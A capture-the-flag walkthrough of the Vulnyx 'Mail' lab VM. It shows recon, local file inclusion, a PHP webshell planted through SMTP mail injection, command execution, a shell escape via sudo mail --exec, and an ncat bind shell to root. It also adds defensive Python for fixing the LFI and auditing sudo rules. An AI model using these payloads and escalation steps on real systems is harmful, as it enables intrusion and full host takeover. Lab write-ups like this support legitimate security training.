Vulnyx-Mail-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

```
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.224 08:00:27:1e:d6:8d PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.062 seconds (124.15 hosts/sec). 4 responded
export ip=192.168.60.224
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.224:22
Open 192.168.60.224:25
Open 192.168.60.224:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 08:40 CST
Initiating ARP Ping Scan at 08:40
Scanning 192.168.60.224 [1 port]
Completed ARP Ping Scan at 08:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:40
Completed Parallel DNS resolution of 1 host. at 08:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:40
Scanning 192.168.60.224 [3 ports]
Discovered open port 22/tcp on 192.168.60.224
Discovered open port 25/tcp on 192.168.60.224
Discovered open port 80/tcp on 192.168.60.224
Completed SYN Stealth Scan at 08:40, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.224
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-03-04 08:40:29 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
25/tcp open smtp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:1E:D6:8D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
```

Scan for directories

```
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 271]
/1 (Status: 200) [Size: 335]
/2 (Status: 200) [Size: 365]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

LFI vulnerability

index.html contains a form

[image]

Submitting it redirects to emailreader.php?id=; the id parameter looks like a candidate for file inclusion.

Test for LFI

This reveals two users: cain and abel

```
❯ curl http://192.168.60.224/emailreader.php\?id\=file:///etc/passwd |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1554 100 1554 0 0 500k 0 --:--:-- --:--:-- --:--:-- 505k
root:x:0:0:root:/root:/bin/bash
cain:x:1000:1000:cain,,,:/home/cain:/bin/bash
abel:x:1001:1001::/home/abel:/bin/bash
```

Alternatively, both usernames can also be found in the mail conversation.

I first ran rockyou against these two usernames,

then went on to gather other information.
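The root cause above is that emailreader.php hands the `id` parameter straight to a file include, so `file:///etc/passwd` and `/var/mail/cain` are both accepted. The following is an added example, not code from the walkthrough or the Vulnyx box, showing the two checks a safe lookup needs: a strict allowlist on the identifier itself and a canonical-path containment check after joining it to a fixed mailbox directory (the second check also refuses symlinks planted inside that directory). The directory layout and the valid-id pattern are assumptions for this demo.

```python
# Added example (not from the walkthrough): constrain a message-id lookup so the
# parameter can no longer reach arbitrary files.
# Assumptions (constructed for this demo): messages live as plain files under one
# fixed directory, and the only valid ids are short alphanumeric names.
import os
import re
import tempfile

# Allowlist for the id: no '/', no '..', no scheme such as 'file://'.
ID_PATTERN = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def resolve_mail_path(mail_dir: str, user_id: str):
    """Return the canonical path for `user_id` inside `mail_dir`, or None when
    the id fails the allowlist or the resolved path escapes the directory."""
    if not ID_PATTERN.fullmatch(user_id):
        return None
    base = os.path.realpath(mail_dir)
    candidate = os.path.realpath(os.path.join(base, user_id))
    # Containment check on the *resolved* path, so a symlink inside mail_dir
    # that points at /etc/passwd is rejected as well.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def read_mail(mail_dir: str, user_id: str) -> str:
    """Safe replacement for the include: read only an allowlisted message."""
    path = resolve_mail_path(mail_dir, user_id)
    if path is None:
        return "no such message"
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def demo():
    """Build a throwaway mail directory and show which ids are accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("1", "message one"), ("2", "message two")):
            with open(os.path.join(tmp, name), "w") as fh:
                fh.write(body)
        # A symlink inside the mail dir that points outside it must be refused.
        os.symlink("/etc/hostname", os.path.join(tmp, "3"))
        probes = ("1", "2", "3", "file:///etc/passwd",
                  "../../etc/passwd", "/var/mail/cain")
        return {probe: read_mail(tmp, probe) for probe in probes}


if __name__ == "__main__":
    for probe, result in demo().items():
        print(f"{probe!r:24} -> {result!r}")
```

Only `1` and `2` return content; the traversal, the `file://` URL, the absolute mailbox path and the planted symlink all fall through to "no such message". The same shape (allowlist the identifier, then check the realpath) carries over to the PHP original.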

Log injection

Found that mail injection can be used here; I think it counts as a kind of log injection.

Use telnet to send a mail to user cain

Put a one-line webshell in the DATA section

```
❯ telnet $ip 25
Trying 192.168.60.224...
Connected to 192.168.60.224.
Escape character is '^]'.
220 mail.home ESMTP Postfix (Debian/GNU)
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
hahahaha
.
250 2.0.0 Ok: queued as AE2C55AC
quit
221 2.0.0 Bye
Connection closed by foreign host.
```

Read cain's mailbox via the LFI

```
❯ curl http://192.168.60.224/emailreader.php\?id\=/var/mail/cain
<pre>
From [email protected] Tue Mar 4 02:03:42 2025
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from unknown (unknown [192.168.60.100])
by mail.home (Postfix) with SMTP id AE2C55AC
for <[email protected]>; Tue, 4 Mar 2025 02:03:09 +0100 (CET)

hahahaha

</pre>
```

Try executing a command; it runs successfully

```
❯ curl http://192.168.60.224/emailreader.php\?id\=/var/mail/cain\&cmd\=id
<pre>
From [email protected] Tue Mar 4 02:03:42 2025
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from unknown (unknown [192.168.60.100])
by mail.home (Postfix) with SMTP id AE2C55AC
for <[email protected]>; Tue, 4 Mar 2025 02:03:09 +0100 (CET)

uid=1000(cain) gid=1000(cain) groups=1000(cain)
hahahaha

</pre>
```

User privilege escalation

Get a reverse shell

There is a sudo entry allowing mail to be run

```
❯ pwncat-cs -lp 4444
[09:13:30] Welcome to pwncat 🐈! __main__.py:164
[09:13:40] received connection from 192.168.60.224:39822 bind.py:84
[09:13:40] 192.168.60.224:39822: registered new host w/ db manager.py:957
(local) pwncat$
(remote) cain@mail:/var/www/html$
(remote) cain@mail:/home/cain$ sudo -l
Matching Defaults entries for cain on mail:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cain may run the following commands on mail:
(abel) NOPASSWD: /usr/bin/mail
(remote) cain@mail:/home/cain$ sudo -u abel /usr/bin/mail --exec='!/bin/bash'
abel@mail:/home/cain$ cd ~
abel@mail:~$ cat user.txt
170e07ec2a52b4c0583dadd5e04a2998
```

Root privilege escalation

After escalating to abel, enumerate again

sudo allows running ncat

but only in IPv6 mode

```
abel@mail:~$ sudo -l
Matching Defaults entries for abel on mail:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User abel may run the following commands on mail:
(root) NOPASSWD: /usr/bin/ncat -6 *
```
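Both escalations on this box come from the same class of sudoers mistake: a NOPASSWD rule for a program that can spawn a shell (`mail` with `--exec`, `ncat` with `-e`), the second one made worse by a trailing wildcard that lets the caller append any option. The following is an added example, not from the walkthrough, of a small audit that parses `sudo -l` style output and flags those three properties. The list of shell-capable binaries is a short illustrative set, not a complete catalogue, and the sample output is constructed from the two rules seen on this box plus one benign rule for contrast.

```python
# Added example (not from the walkthrough): audit `sudo -l` output for rules that
# give a caller an interactive escape to another account.
import re

# Illustrative, not exhaustive: programs that can run a shell or arbitrary
# commands once they execute under sudo.
SHELL_CAPABLE = {"mail", "ncat", "nc", "vim", "vi", "less", "find", "python3", "bash", "sh"}

# "(runas) [TAG: ...] command args"
RULE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Constructed sample, combining the rules seen for cain and abel with a benign one.
SAMPLE_SUDO_L = r"""Matching Defaults entries for abel on mail:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User abel may run the following commands on mail:
    (root) NOPASSWD: /usr/bin/ncat -6 *
    (abel) NOPASSWD: /usr/bin/mail
    (root) /usr/bin/apt update
"""


def audit_rule(line: str):
    """Return a list of findings for one rule line; empty means nothing flagged."""
    m = RULE.match(line.strip())
    if not m:
        return []
    runas = m.group("runas").split(":")[0].strip()
    tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
    cmd = m.group("cmd").strip()
    parts = cmd.split()
    binary = parts[0].rsplit("/", 1)[-1]
    args = parts[1:]

    findings = []
    if "NOPASSWD" in tags:
        findings.append("NOPASSWD: no authentication step before escalation")
    if binary in SHELL_CAPABLE:
        findings.append(f"{binary} can spawn a shell or run arbitrary commands")
    if cmd == "ALL" or any("*" in a for a in args):
        findings.append("wildcard argument: caller-controlled options reach the binary")
    if runas == "root" and findings:
        findings.append("runs as root")
    return findings


def audit_sudo_l(output: str):
    """Map each rule line after the 'may run the following commands' banner to
    its findings."""
    results = {}
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules and line.startswith("("):
            results[line] = audit_rule(line)
    return results


if __name__ == "__main__":
    for rule, findings in audit_sudo_l(SAMPLE_SUDO_L).items():
        status = "; ".join(findings) if findings else "ok"
        print(f"{rule}\n    {status}")
```

The fix on the box is the usual one: drop the wildcard, require a password, and prefer a wrapper script with fixed arguments over granting the bare binary.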

I enabled IPv6 on my VM's NAT adapter, and now the box has an IPv6 address.

Try the reverse shell

```
abel@mail:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:1e:d6:8d brd ff:ff:ff:ff:ff:ff
inet 192.168.60.224/24 brd 192.168.60.255 scope global dynamic enp0s3
valid_lft 1745sec preferred_lft 1745sec
inet6 fd15:4ba5:5a2b:1008:a00:27ff:fe1e:d68d/64 scope global dynamic mngtmpaddr
valid_lft 86380sec preferred_lft 14380sec
inet6 fe80::a00:27ff:fe1e:d68d/64 scope link
valid_lft forever preferred_lft forever
abel@mail:~$ sudo /usr/bin/ncat -6 -l -p 1234 -e /bin/bash
-----------------------------------
❯ ncat -6 fe80::a00:27ff:fe1e:d68d%eth0 1234
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
9f0541ef5fd69bfc3b2d4507eaf2a9db
```